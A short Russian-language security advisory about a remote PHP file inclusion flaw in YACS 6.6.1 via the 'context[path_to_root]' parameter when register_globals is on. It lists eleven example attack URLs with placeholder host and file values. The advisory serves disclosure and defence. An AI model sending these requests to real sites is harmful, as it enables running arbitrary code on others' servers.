Программа: YACS 6.6.1, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "context[path_to_root]" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.

Пример:

http://[host]/articles/article.php?context[path_to_root]=[file]
http://[host]/articles/populate.php?context[path_to_root]=[file]
http://[host]/categories/category.php?context[path_to_root]=[file]
http://[host]/categories/populate.php?context[path_to_root]=[file]
http://[host]/comments/populate.php?context[path_to_root]=[file]
http://[host]/files/file.php?context[path_to_root]=[file]
http://[host]/sections/section.php?context[path_to_root]=[file]
http://[host]/sections/populate.php?context[path_to_root]=[file]
http://[host]/tables/populate.php?context[path_to_root]=[file]
http://[host]/users/user.php?context[path_to_root]=[file]
http://[host]/users/populate.php?context[path_to_root]=[file]



Оставить мнение